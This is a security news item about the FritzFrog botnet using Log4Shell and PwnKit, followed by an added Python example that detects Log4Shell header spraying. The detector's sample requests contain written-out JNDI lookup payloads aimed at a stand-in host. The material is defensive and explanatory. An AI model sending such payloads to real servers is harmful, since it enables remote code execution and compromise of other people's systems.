
FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities
2024-02-01 15:21

The FritzFrog cryptomining botnet has new potential for growth: a recently analyzed variant of the bot is exploiting the Log4Shell and PwnKit vulnerabilities for lateral movement and privilege escalation.

The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer botnet powered by malware written in Golang.

"FritzFrog identifies potential Log4Shell targets by looking for HTTP servers over ports 8080, 8090, 8888 and 9000. To trigger the vulnerability, an attacker needs to force the vulnerable log4j application to log data containing a payload," security researcher Ori David explained.

"FritzFrog sends the Log4Shell payload in numerous HTTP headers, hoping that at least one of them gets logged by the application. This brute force exploitation approach aims to be a generic Log4Shell exploit that can affect a wide variety of applications."

Finally, FritzFrog manages to evade detection by avoiding dropping files to disk whenever possible.

The researchers have provided a detection script enterprise defenders can use to check their SSH servers for indicators of a FritzFrog infection.
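The header spraying described in the quote above leaves a recognizable trace on the receiving side: one request carrying the same JNDI lookup in several headers. The following is an added example, not the researchers' SSH detection script or code from the original article. It classifies raw HTTP requests by how many headers carry a lookup; the function names, the threshold of three headers and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# HTTP ports the article says FritzFrog probes for Log4Shell targets.
FRITZFROG_HTTP_PORTS = {8080, 8090, 8888, 9000}
# Plain JNDI lookup marker; obfuscated nested lookups are out of scope here.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
SPRAY_THRESHOLD = 3  # assumed cutoff: marker in >= 3 headers of one request

def parse_headers(raw):
    """Return [(name, value), ...] from a raw HTTP/1.x request head."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers

def classify(raw, dst_port):
    """Label one request 'spray', 'single' or 'clean' by tainted header count."""
    hits = [n for n, v in parse_headers(raw) if JNDI_RE.search(unquote(v))]
    if len(hits) >= SPRAY_THRESHOLD:
        verdict = "spray"
    elif hits:
        verdict = "single"
    else:
        verdict = "clean"
    return {"verdict": verdict, "headers": hits,
            "fritzfrog_port": dst_port in FRITZFROG_HTTP_PORTS}

# Constructed sample requests (not captured traffic).
MARK = "${jndi:ldap://example.invalid/a}"
SPRAYED = ("GET / HTTP/1.1\r\nHost: app.example.invalid:8080\r\n"
           f"User-Agent: {MARK}\r\nReferer: {MARK}\r\n"
           "X-Forwarded-For: %24%7Bjndi:ldap://example.invalid/a%7D\r\n\r\n")
SINGLE = f"GET / HTTP/1.1\r\nHost: www.example.invalid\r\nX-Api-Version: {MARK}\r\n\r\n"
BENIGN = ("GET /health HTTP/1.1\r\nHost: app.example.invalid:8080\r\n"
          "User-Agent: curl/8.5.0\r\n\r\n")

if __name__ == "__main__":
    for raw, port in ((SPRAYED, 8080), (SINGLE, 443), (BENIGN, 9000)):
        print(port, classify(raw, port))
```

A "spray" verdict on one of the listed ports is the combination the article attributes to FritzFrog; a "single" hit is still a Log4Shell probe worth triaging, just not this pattern.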


News URL

https://www.helpnetsecurity.com/2024/02/01/botnet-log4shell-pwnkit/